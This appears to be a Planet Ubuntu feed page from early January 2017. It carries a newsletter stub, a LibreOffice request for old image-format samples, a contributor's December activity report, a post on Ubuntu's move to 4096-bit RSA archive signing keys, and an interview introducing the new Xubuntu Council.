Welcome to the Ubuntu Weekly Newsletter. This is issue #493 for the weeks of December 19, 2016 – January 1, 2017, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

Bryan Quigley: Do you have any old file format images?

Planet Ubuntu - Tue, 01/03/2017 - 07:47

I’m specifically looking for:
OS/2 Metafile (.met)
PICT (Mac’s precursor to PDF) https://en.wikipedia.org/wiki/PICT

Also useful might be:
PCD – Kodak Photo CD
RAS – Sun Raster Image

I’m trying to evaluate if LibreOffice should keep support for them (specifically if the support is good). Unfortunately I can only generate the images using LibreOffice (or sister projects) which doesn’t really provide a great test.

Please either:
* Provide a link in a comment below
* Email me B @ (If emailed, please mention if I can share the image publicly)

If I find the support works great I’d try to integrate a few of them into LO tests so we make sure they don’t regress.

Thank you!  [Update, files are now part of LibreOffice’s test server]

 

Ross Gammon: Happy New Year – My Free Software activities in December 2016

Planet Ubuntu - Mon, 01/02/2017 - 15:58

So that was 2016! Here’s a summary of what I got up to on my computer(s) in December, a check of how I went against my plan, and the TODO list for the next month or so.

With a short holiday to Oslo, Christmas holidays, Christmas parties (at work and with Alexander at school, football etc.), travelling to Brussels with work, birthdays (Alexander & Antje), I missed a lot of deadlines, and failed to reach most of my Free Software goals (including my goals for new & updated packages in Debian Stretch – the soft freeze is in a couple of days). To top it all off, I lost my grandmother at the ripe old age of 93. Rest in peace Nana. I wish I could have made it to the funeral, but it is sometimes tough living on the other side of the world to your family.

Debian

Ubuntu
  • Added the Ubuntu Studio testsuites to the package tracker, and blogged about running the Manual Tests.
Other

Plan status & update for next month

Debian

Before the 5th January 2017 Debian Stretch soft freeze I hope to:

For the Debian Stretch release:

Ubuntu
  • Add the Ubuntu Studio Manual Testsuite to the package tracker, and try to encourage some testing of the newest versions of our priority packages. – Done
  • Finish the ubuntustudio-lightdm-theme, ubuntustudio-default-settings transition including an update to the ubuntustudio-meta packages. – Still to do
  • Reapply to become a Contributing Developer. – Still to do
  • Start working on an Ubuntu Studio package tracker website so that we can keep an eye on the status of the packages we are interested in. – Still to do
  • Start testing & bug triaging Ubuntu Studio packages.
  • Test Len’s work on ubuntustudio-controls
Other
  • Continue working to convert my Family History website to Jekyll – Done
  • Try and resurrect my old Gammon one-name study Drupal website from a backup and push it to the new GoONS Website project.
  • Give JMRI a good try out and look at what it would take to package it.

Dimitri John Ledkov: Ubuntu Archive and CD/USB images complete migration to 4096 RSA signing keys

Planet Ubuntu - Mon, 01/02/2017 - 06:54

Enigma machine photo by Alessandro Nassiri [CC BY-SA 4.0], via Wikimedia Commons
Ubuntu Archive and CD/USB images use OpenPGP cryptography for verification and integrity protection. In 2012, a new archive signing key was created and we started to dual-sign everything with both the old and new keys.

In April 2017, Ubuntu 12.04 LTS (Precise Pangolin) will go end of life. Precise was the last release that was signed with just the old signing key. Thus when Zesty Zapus is released as Ubuntu 17.04, there will no longer be any supported Ubuntu release that requires the 2004 signing keys for validation.

The Zesty Zapus release is now signed with just the 2012 signing key, which is a 4096-bit RSA key. The old 2004 signing keys, which were 1024-bit DSA, have been removed from the default keyring and are no longer trusted by default in Zesty and up. The old keys are available in the removed-keys keyring in the ubuntu-keyring package, for example in case one wants to verify things from old-releases.ubuntu.com.

Thus the signing key transition is coming to an end. Looking forward, I hope that by the 18.04 LTS time-frame the SHA-3 algorithm will have made its way into the OpenPGP spec and that we will possibly start a transition to 8192-bit RSA keys. But this is just wishful thinking, as the current key strength, algorithm, and hash sums are deemed sufficient.
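As an aside, SHA-3 is already usable outside OpenPGP; Python's hashlib, for instance, has exposed it since 3.6. A small illustration (the input string here is just an arbitrary example, not anything Ubuntu signs):

```python
import hashlib

# SHA3-256 produces a 256-bit (64 hex character) digest, the same output
# size as SHA-256 but built on the Keccak sponge construction.
digest = hashlib.sha3_256(b"ubuntu-archive-example").hexdigest()
print(digest)
```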

Xubuntu: Introducing the Xubuntu Council

Planet Ubuntu - Sun, 01/01/2017 - 09:43

At the beginning of 2016 the Xubuntu team started a process to transition the project to become council-run rather than having a single project leader. After careful planning, writing, and approving the general direction, the team was ready to vote for the first three members of the project's council.

In this article we explain what the new Xubuntu Council is and who the council members are.

What is the Xubuntu Council about?

The purpose of the council is very similar to the purpose of the former Xubuntu Project Leader (XPL): to make sure the direction of the project stays stable and adheres to the Strategy Document, and to be responsible for making long-term plans and decisions where needed.

The two main differences between a council and the XPL, both favoring the council approach, are:

  • The administrative and bureaucratic work of managing the project is split between several people. This means more reliability and faster response times.
  • A council, with a diversity of views, can more fairly evaluate and arbitrate disputes.

Additionally, the council will stay more in the background in terms of daily decisions; it does not have a casting or veto vote in the way that the XPL had. We believe this lets us embrace the expertise in the team even more than we did before. The council also acts as a fallback to avoid deadlocks that a single point of failure like “an XPL gone missing” could produce.

If you wish to learn more about the council, you can read about it in the Xubuntu Council section of our contributor documentation.

Who is in the Council?

On August 31st, Simon Steinbeiß announced the results of the vote by Xubuntu project members. The first Xubuntu Council contains the following members:

  • Sean Davis (bluesabre), the council chair and the Xubuntu Technical Lead
  • Simon Steinbeiß (ochosi), the Xubuntu Artwork Lead and a former XPL
  • Pasi Lallinaho (knome), the Xubuntu Website Lead and a former XPL and former Xubuntu Marketing Lead

As the titles alone can tell you, the three council members all have a strong history with the Xubuntu project. Today we want to go a bit deeper than just these titles, which is why we asked the council members a few quick questions so you can start to get to know them.

Interviewing the Council What inspired you to get involved with the Xubuntu project?

Sean: I started using Xubuntu in 2006 (when it was first released) and used it all throughout college and into my career. I started reporting bugs to the project in 2012 and contributing to the Ubuntu community later that year. My (selfish) inspiration was that I wanted to make my preferred operating system even better!

Simon: When Dapper Drake saw the light of day 10 years ago (I know, it’s incredible – it’s been a decade!) and I started using Linux, my first choice was – and this has never changed – Xfce and Ubuntu. At first I never thought I would be fit to contribute, but the warm welcome from the amazing community around these projects pulled me in.

Pasi: When I converted to Linux from Windows for good in 2006, I started contributing to the Amarok project, my media player of choice back then. A few years later my contributions there slowed down, and it felt like a natural step to start working with the operating system I was using.

Can you share some thoughts about the future of Xubuntu?

Sean: Xubuntu has always taken a conservative approach to the desktop. It includes simple, effective applications on top of a traditional desktop. That said, the technologies that Xubuntu is built on (GTK+, GStreamer, Xfce, and many many others) are undergoing significant changes, and we’re always looking to improve. I think we’ll continue to see improvements that will welcome new users and please our longtime fans.

Simon: Change is hard for many people; however, based on a recent psych test I am “surprisingly optimistic” :) While Xubuntu – and this is heritage from Xfce – has what many would call a “conservative” approach, I believe we can still improve the current experience quite a bit. I don’t mean this change has to be radical, but it should be more than just “repainting the walls”. This is why I personally welcome the changes in GTK+ and why I believe our future is bright.

Pasi: As Sean mentioned, we will be seeing changes in Xubuntu as a consequence of the underlying technologies and components – whether we like them or not. To be part of the decision making, and to ensure that Xubuntu can and will feel as integrated and polished as it does now, it’s important to stay involved with the migration work. While this will mean fewer resources to put into Xubuntu-specific work in the near future, I believe it leads us to a better place later.

So that people can get to know you a bit better, is there an interesting fact about yourself that you wish to share?

Sean: Two unrelated things: I’m also an Xfce developer and one of my current life goals is to visit Japan (and maybe one day live there).

Simon: My background is a bit atypical: my two majors at University were Philosophy and Comparative Religious Studies.

Pasi: In addition to contributing to open source, I use my free time to play modern board games. I have about 75 of them in my office closet.

Further questions?

If you have any questions about the council, please don’t hesitate to ask! You can contact us by joining the IRC channel #xubuntu-devel on freenode or by joining the Xubuntu-devel mailing list.

Additionally, if this sparked your interest to get involved, be in touch with anybody from the Xubuntu team. There are a lot of things to do and all kinds of skills are useful. Maybe someday you might even become a Xubuntu Council member!
